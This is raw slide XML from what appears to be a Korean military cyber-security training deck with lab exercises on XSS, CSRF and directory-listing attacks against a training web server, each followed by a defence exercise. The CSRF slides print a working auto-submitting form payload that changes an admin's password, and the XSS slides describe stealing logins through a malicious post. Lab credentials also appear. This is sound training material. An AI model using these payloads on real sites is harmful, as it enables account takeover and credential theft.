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644" r:id="rId3"/>
    <p:sldId id="646" r:id="rId4"/>
    <p:sldId id="673" r:id="rId5"/>
    <p:sldId id="645" r:id="rId6"/>
    <p:sldId id="642" r:id="rId7"/>
    <p:sldId id="643" r:id="rId8"/>
    <p:sldId id="683" r:id="rId9"/>
    <p:sldId id="679" r:id="rId10"/>
    <p:sldId id="680" r:id="rId11"/>
    <p:sldId id="681" r:id="rId12"/>
    <p:sldId id="767" r:id="rId13"/>
    <p:sldId id="682" r:id="rId14"/>
    <p:sldId id="757" r:id="rId15"/>
    <p:sldId id="768" r:id="rId16"/>
    <p:sldId id="758" r:id="rId17"/>
    <p:sldId id="759" r:id="rId18"/>
    <p:sldId id="760" r:id="rId19"/>
    <p:sldId id="769" r:id="rId20"/>
    <p:sldId id="764" r:id="rId21"/>
    <p:sldId id="76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6199D-443D-489B-AFD5-0E0A0AA52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63C7CA-3AC8-4A30-BB67-62BA89AB3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319BC-9A43-409D-BBA6-4F9FF5C8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0932-D615-4C7A-98CF-CCA575A70F69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30FFB-116F-4772-B052-4515840C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B1DCA-6B2A-4984-9BFA-2B43B881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450A-BB47-47BE-BB22-351AA45E4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8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E1651-0A4E-4783-BE5E-B89C3145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7FF662-624F-4247-93F6-4A8792D1B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5D9D7-6989-4A6E-ACD7-1E916C5C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0932-D615-4C7A-98CF-CCA575A70F69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B163B-1E8E-4A8D-85A0-5CBB7247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A3760-89D8-4B96-9E84-FA310292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450A-BB47-47BE-BB22-351AA45E4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64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DEC70B-7CEF-4110-9521-3305B9590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B6E413-08AB-449B-A338-0F218E41E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5BCC5-9F18-4590-9F98-B8C74986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0932-D615-4C7A-98CF-CCA575A70F69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1CC66-08A1-4100-9D50-59D521B8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34BB1-6A29-4FDD-A2EE-3FB46903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450A-BB47-47BE-BB22-351AA45E4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02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C9C3F-4CC3-4B86-A117-8FDD5AD5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736FE-7922-49DE-984A-271155E9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0E154-1969-4345-93D6-932640A4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0932-D615-4C7A-98CF-CCA575A70F69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3050F-7ACA-4706-A6AF-38EE21F4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A68F9-C2C5-45E7-B39A-956F27A4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450A-BB47-47BE-BB22-351AA45E4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5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5F9C5-B024-46E5-A7CE-4D04668E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7CA69-0009-4616-BB34-431BE4F2F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F430F-5703-4B82-B9BC-BC50B320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0932-D615-4C7A-98CF-CCA575A70F69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76BC7-81B7-49BE-BAC4-86D1022E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041A9-F615-4F14-9F1A-D1A4A033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450A-BB47-47BE-BB22-351AA45E4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8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D2288-3B63-4E2A-B0D0-F5B15E28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338E5-7624-4AD0-A69E-2D2E25A8E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605CC6-3BD6-461B-B2C6-D7CBC183B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18A8B9-B434-4E00-996F-55411E92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0932-D615-4C7A-98CF-CCA575A70F69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3BEF38-C93A-462C-AC43-F53AAF1B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2299DF-03F8-4DE8-9711-A912E3A2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450A-BB47-47BE-BB22-351AA45E4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58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BFCAE-18C5-4572-8F29-3CF498A7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8E7033-CCAD-4B8C-A182-614781A00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A5ACD7-99D6-4296-9FB2-3FA6CB01B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AA3BF9-72CF-469C-AD27-AA4D6616F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46A975-CDB0-4557-8C6E-34C711E64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DB6A1E-87D7-4179-959D-C0D6442D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0932-D615-4C7A-98CF-CCA575A70F69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BEF294-9DD4-4B70-9059-2FCBCCC4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2EC239-4ACD-420C-A76A-54DCF116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450A-BB47-47BE-BB22-351AA45E4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5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9E40-7702-4D8D-824D-97986222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69068-04C3-4171-86B7-CAAA6E12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0932-D615-4C7A-98CF-CCA575A70F69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038D2C-4E21-4B20-AF24-E5D88FDF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29DBB2-C3F5-4812-A780-2F2AFAF2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450A-BB47-47BE-BB22-351AA45E4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1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388BB2-13B8-4DC9-BCB8-50E127E0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0932-D615-4C7A-98CF-CCA575A70F69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6AC303-E5BD-4201-BA51-9ABE46D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D5004B-7517-4DC0-AC78-D6BE7882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450A-BB47-47BE-BB22-351AA45E4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94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E9FA0-2EED-4696-9BD2-E96EF153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5FBA9D-7368-4AE2-846A-E772C56D6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1FECE-597E-450D-A5C3-3B77333D7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20ABC-1833-4D64-A88D-C7255232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0932-D615-4C7A-98CF-CCA575A70F69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C6B925-7DEE-4925-A36E-6F2C67EF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98900-8762-4CEF-9AF4-4391D358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450A-BB47-47BE-BB22-351AA45E4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9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B4ACD-F349-4700-A82B-E37E067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4CC061-3DD3-4576-96ED-3A00CC821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A0CAFA-B860-431D-A63A-8DE612460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6FC34D-6B72-4AD1-9815-6E4E0775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0932-D615-4C7A-98CF-CCA575A70F69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1CFF22-FC89-420D-92A1-23CF54F0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02E9F9-881F-4285-8728-96D74AC0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450A-BB47-47BE-BB22-351AA45E4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72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4AC9CB-50A2-44DA-8B5C-804A62EE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4FD76-D8E1-4F9B-ACCD-6A51BBDB0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74DC7-938F-4FA3-8B75-803B932CF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0932-D615-4C7A-98CF-CCA575A70F69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36706-D579-4B88-ABCF-362B54B59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35659-A80B-4924-B711-508D645FD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1450A-BB47-47BE-BB22-351AA45E4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9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D6BF-4BE7-4B95-87F4-1C4559C01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국방 사이버 보안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BF306-A7A3-41EC-91E2-168031C1A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872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AA81B6A5-057E-4ECB-9CBB-3A1898D09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29" y="4496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6) http://web.navy.mil.kr/webhack/Guestboard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에 들어가기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_x106415520">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86DCF8DC-2F2B-4188-8F71-654FE9421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9" y="906862"/>
            <a:ext cx="540067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148329-1AF8-442C-AD30-132DDAD95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088" y="7529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7)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게시글 생성 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계정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ID: ltest01 Password: test01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Email: test01@hack.mil.kr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Subject: attack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Contents : /var/www/xssattack.txt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내용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_x106417680">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E35ACD9-FE91-44D6-9C51-54FC26EF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t="3410" r="6000" b="4547"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6183088" y="1210137"/>
            <a:ext cx="4751388" cy="36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19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176418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9B13B75B-F62D-426E-9AD1-186157679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20" y="6123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8)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게시글 위치 확인 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악의적인 게시글이 있는 게시판에서 마우스 오른쪽 클릭 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Copy link location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_x106415088">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC05E2B4-3196-4AA6-898D-09DF7EDC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20" y="1069522"/>
            <a:ext cx="5400675" cy="273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0A22C68-31B4-4018-80DE-0C2F3F46A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29" y="40669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9) admin/lab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로그인 후 공격 게시글에 접근 후 공격 성공 확인 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재 로그인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id;admin pw lab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_x106416312">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B5FF27A-7106-4E4A-A0A2-3F4F0C21E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6" t="12424" r="10594" b="27367"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="473529" y="4524134"/>
            <a:ext cx="2695575" cy="12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65D21708-4F83-4C13-9935-1ED79C941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730" y="4816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vi /var/www/phishing-result.txt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파일에 로그인 정보 확인 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9" name="_x106415448">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA63D7BA-F0BF-4D05-923C-9F82E378F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730" y="938893"/>
            <a:ext cx="54006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6171C6-2745-44E2-B88C-FF61E058E1E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="2376502"/>
            <a:ext cx="5616792" cy="41124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터미널 실행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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># check</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5BE5944-97BD-4F34-956A-F6554F4D2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660" y="2889859"/>
            <a:ext cx="5113020" cy="754315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171487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/Training/Unit/Web/8</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 8. XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>방어 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>대응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귀하의 피해 서버는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XSS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 공격을 통해 특정 게시글에 접근하면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id/password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값을 갈취당하는 피해가 나타났다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이때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xss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하고 있는 게시글을 웹 서버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접근하여 찾아 삭제하고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XSS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취약점에 대해 대응하여라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toor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mysql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접근 방법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mysql –u root –p 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게시글 파일 위치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        	/var/www/html/webhack/board/board_write_ok.php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XSS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 공격을 탐지하고 대응 할 수 있다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chemeClr val="bg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6)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4749B9AA-465F-472F-A9B6-76C8B11FC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오른쪽 15">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3BBF55D-9530-477E-B322-C490450DF56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6948C8-67D4-42B2-B648-8637313C9B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D43794-A274-42D3-AF8E-BA3EBFA5B0B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B59B0-4A53-47EE-8E7E-0B19CF4CCF1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9A13631E-5D34-467E-A933-86B73C5E71B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3048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8" name="_x106417824">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F82071F-9D99-4D51-87EE-AE9A8A24C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1126795"/>
            <a:ext cx="5400675" cy="22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_x106417392">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{838E1D24-8DD4-425E-AF86-1518BF15C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3823958"/>
            <a:ext cx="5400675" cy="95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9EC8025C-A24C-48DD-94A9-5A9214E39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57" y="6695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1) mysql –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 root –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로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에 접근 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mysql -u root -p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󰏮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lab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󰏮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A069C42-B55A-4451-A397-F8BE876CD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57" y="33667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테이블에서 악의적인 행위가 들어있는 게시글 확인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use webhack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󰏮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select * from board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󰏮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88C6F3-577E-4D7B-A53D-82E581C0C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57" y="42943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_x106414512">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E01E188-3115-4E88-A952-CCBCB29AC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4751549"/>
            <a:ext cx="5400675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_x106414512">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1595B7C-1543-4AE8-A21C-CCA75092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843" y="860095"/>
            <a:ext cx="5400675" cy="3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_x106418832">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC6A99D9-6F34-4718-B7D6-3B3FC75DE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843" y="1869513"/>
            <a:ext cx="3932238" cy="38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1E19D4-D33D-43F0-839F-26D15AFD8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843" y="4028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웹 페이지 접속 후 악의적인 게시글 확인 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3E9C73-23AE-463B-8EB5-DD23B6BE2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843" y="1412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0" lang="ko-KR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대응</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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1) mysql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접속 후 해당 테이블 삭제 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delete from board where strNumber ="75";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󰏮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F97A355F-3121-433D-8BA9-80FDB1F3A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843" y="23954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웹 페이지 게시글 업로드 되는 웹 소스 수정 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vi var/www/html/webhack/board/board_write_ok.php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󰏮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7" name="_x106415160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D9691F2-F35E-4BA6-B673-41F1A2195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468" y="2844801"/>
            <a:ext cx="5400675" cy="316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99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185985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134B9F08-58FE-4DF5-854E-82F237584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29" y="6939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웹 서비스 재시작 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service httpd restart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󰏮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service mysqld restart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󰏮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(mysql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변경이 있으므로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mysqld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서비스도 재시작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_x106418256">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0EE4B3D-6134-4410-A258-FE519F537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9" y="1151164"/>
            <a:ext cx="5400675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1CD56F-666B-4278-A0FD-1A883B875B25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="2387588"/>
            <a:ext cx="5616792" cy="41124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터미널 실행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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># check</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48EB20A5-0819-492D-A96F-C4481AFD0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94" y="2900945"/>
            <a:ext cx="5113020" cy="754315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3237793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/Training/Unit/Web/9</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 9. 3.1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>크로스 사이트 요청변조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공격자는 현재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CSRF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 코드를 업로드 하고 실행할 수 있는 취약점 서버를 확인 하였다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취약점에 대한 코드를 게시 글에 업로드 하고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admin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계정 로그인 하여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게시글에 접근해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비밀번호를 변조하여라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toor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피해 웹 서버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http://web.navy.mil.kr/webhack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csrf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소스 위치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/root/csrf.txt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admin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정보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admin / lab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CSRF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 공격을 탐지하고 대응 할 수 있다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chemeClr val="bg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6)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4749B9AA-465F-472F-A9B6-76C8B11FC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오른쪽 15">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3BBF55D-9530-477E-B322-C490450DF56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6948C8-67D4-42B2-B648-8637313C9B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D43794-A274-42D3-AF8E-BA3EBFA5B0B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B59B0-4A53-47EE-8E7E-0B19CF4CCF1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9A13631E-5D34-467E-A933-86B73C5E71B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211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A3B14FFC-FD71-4870-8229-61E5E3BF7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58" y="6041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CSRF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공격을 할 소스를 수정 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피해 웹 서버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http://web.navy.mil.kr/webhack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vi /root/csrf.txt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󰏮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_x926273848">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B41ED67-59D4-466F-A6C9-3816229FC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1061357"/>
            <a:ext cx="5400675" cy="189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24948688-B129-4FA9-9855-0392938A8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58" y="30173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소스 설명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_x926135432">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7193BE85-1B27-4AF2-BDD2-4C0D68BD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58" y="3474584"/>
            <a:ext cx="5456238" cy="2433638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&lt;iframe name="ifrm" width="300" height="300"&gt;&lt;/iframe&gt;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-&gt;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게시글에 생기는 창 크기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&lt;form target="ifrm" name="write_form" method="post" action="http://web.navy.mil.kr/webhack/member/member_modify_ok.php" enctype="multipart/form-data"&gt;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-&gt;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상태로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member_modify_ok.php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정보 수정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&lt;input type="hidden" name="exec" value="modify"&gt; &lt;input type="hidden" name="nickname" value="hacked"&gt; &lt;input type="hidden" name="email" value="hackedEmail"&gt; &lt;input type="hidden" name="password" value="hacked"&gt; &lt;input type="hidden" name="repassword" value="hacked"&gt; &lt;/form&gt; &lt;script&gt; document.write_form.submit(); &lt;/script&gt; &lt;/frame&gt;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-&gt;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스크립트실행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3C5D10E8-71B7-40AC-9042-CE6913E34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730" y="4574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웹 브라우저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iceweasel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프로그램 실행 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53" name="_x927255856">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF738060-CF03-4A14-A4A6-FBD73D171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29"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6247730" y="914627"/>
            <a:ext cx="5400675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4DC61D-E4F1-43F3-8002-F32143FC1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467" y="30826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인터넷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창에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http://web.navy.mil.kr/webhack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를 입력하여 피해 서버에 접속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55" name="_x926137056">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8B24B89-3F54-4DA5-A8A0-34817D9D9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467" y="3539898"/>
            <a:ext cx="5400675" cy="277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33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46402949-32F5-41B3-AD6D-C8551CF0A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64" y="6029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공격자는 피해 웹페이지에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CSRF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취약점 공격을 실행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http://web.navy.mil.kr/webhack/webhack/board/board_list.php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이동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Writing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를 눌러 게시글 작성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_x924068816">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58F1058C-5A84-496B-B8B9-07FB2E82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64" y="1060118"/>
            <a:ext cx="5400675" cy="370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06094F8-B297-4F39-ADD8-739CDC435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730" y="836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게시판 글을 그림처럼 작성한 뒤 저장한다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Author : test01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Password : test01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E-mail : test01@hacked.co.kr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Subject : attack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Contents : /root/csrf.txt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내용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1" name="_x927256216">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20710EC5-7863-490A-8978-0F2B84E8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9" r="1270" b="4601"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6247730" y="1464007"/>
            <a:ext cx="5400675" cy="25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D64B6BCA-FD81-4672-AF5B-B4F123F0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4060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4) admin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계정으로 게시 글 확인 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5" name="_x926137200">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9753093B-20E2-4B61-A0C7-1E49C22DC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" t="5753" r="3621" b="20551"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6343650" y="4518103"/>
            <a:ext cx="4924425" cy="17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211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2341545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8695217A-D9A3-4103-B14F-6947C32E3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4" y="4980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5) view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가 변경되면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계정으로 다시 로그인 해본다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3" name="_x926137272">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B7D10AD-9DA9-4F59-9E55-1C0DD880B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955221"/>
            <a:ext cx="33909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ACF4CD88-B8C8-4789-9553-CACBFA80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4" y="26316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A3C38-8FBA-4A9E-8C92-95FC57B3288E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="2900945"/>
            <a:ext cx="5616792" cy="35991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터미널 실행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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># check</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A68F782-7E8E-4F9C-AEE5-5F0039F2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" y="3461657"/>
            <a:ext cx="5113020" cy="754315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290957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/Training/Unit/Web/9</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 9. 3.1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>크로스 사이트 요청변조 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>대응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귀하의 공격자는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CSRF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취약점을 사용하여 악성 게시글을 접속하면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변경되는 게시글을 만들고 있다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이때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CSRF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취약점을 보완할 수 있는 설정을 하여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차단하여라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 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toor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와이어샤크 툴을 이용하여 탐지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CSRF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공격에 대한 보완 설정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CSRF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 공격을 탐지하고 대응 할 수 있다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chemeClr val="bg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6)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4749B9AA-465F-472F-A9B6-76C8B11FC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오른쪽 15">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3BBF55D-9530-477E-B322-C490450DF56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6948C8-67D4-42B2-B648-8637313C9B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D43794-A274-42D3-AF8E-BA3EBFA5B0B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B59B0-4A53-47EE-8E7E-0B19CF4CCF1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9A13631E-5D34-467E-A933-86B73C5E71B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326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/Training/Unit/Web/2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>취약점 직접 객체 참조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공격자는 현재 디렉토리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리스팅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취약점이 있는 서버를 확인하였다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이때 게시글과 관련된 디렉토리 밑에 접근하여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게시글에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파일을 업로드 하면 보관되는 경로가 어디인지 확인하고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항목들 중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keycode.txt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파일안의 내용을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toor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피해 웹 서버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http://web.navy.mil.kr/webhack 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Directory Listing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 공격을 탐지할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Directory Listing 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 공격을 대응할 수 있다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6)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4749B9AA-465F-472F-A9B6-76C8B11FC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오른쪽 15">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3BBF55D-9530-477E-B322-C490450DF56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6948C8-67D4-42B2-B648-8637313C9B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D43794-A274-42D3-AF8E-BA3EBFA5B0B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B59B0-4A53-47EE-8E7E-0B19CF4CCF1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9A13631E-5D34-467E-A933-86B73C5E71B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0670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219" name="_x16586784">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31BA9025-283E-4718-B21A-031009289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2" y="806420"/>
            <a:ext cx="288925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_x16585848">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAAA3585-C988-4EA4-BA13-CC51F8CE8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2" y="990570"/>
            <a:ext cx="54006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_x16586352">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D56F766B-BB62-4617-8AAD-6196CD0EB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2" y="2990820"/>
            <a:ext cx="5400675" cy="28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19A15122-53B0-45FB-810A-663800378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022" y="3492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웹 서버에서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B85D0FC-85C3-4FEB-8795-1D78C94D0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022" y="9905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아이콘 클릭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D14B7F-B6F0-4D0F-BD96-6B1CFBFE4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022" y="25336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1) wireshark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를 이용하여 악의적인 행위를 하는 패킷 확인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256E85C8-F9AA-4751-A837-6850D378E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022" y="58260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접속한 웹 서버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로 들어오는 패킷 중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패킷으로 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POST /webhack/board/board_write_ok.php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정보로 가져오는 패킷 확인 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25" name="_x925233592">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87C06BF6-51B5-4FAC-BB2E-FCB14F76E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730" y="450597"/>
            <a:ext cx="5400675" cy="307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_x927084464">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8B8875E-FECA-4442-BF0D-3541C1835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8"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6247730" y="3791970"/>
            <a:ext cx="5400675" cy="256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3F4D73-3291-4C25-AB41-B852E0EC7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730" y="-1535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320C7-6644-42BF-BB6F-7A96154F8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730" y="35303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wireshark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를 이용하여 악의적인 행위를 하는 패킷 확인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807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4847981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42" name="_x16585632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A49313C-088F-4D49-B104-2CB11A51F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64" y="1097608"/>
            <a:ext cx="5400675" cy="316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_x928028480">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CB5EC54-4E71-4302-BBE2-2B640F943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64" y="4720283"/>
            <a:ext cx="5400675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B6EECDF3-18EA-4937-A8BE-CEAA304AC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64" y="6485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0" lang="ko-KR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대응</a:t>
            </a:r>
            <a:r>
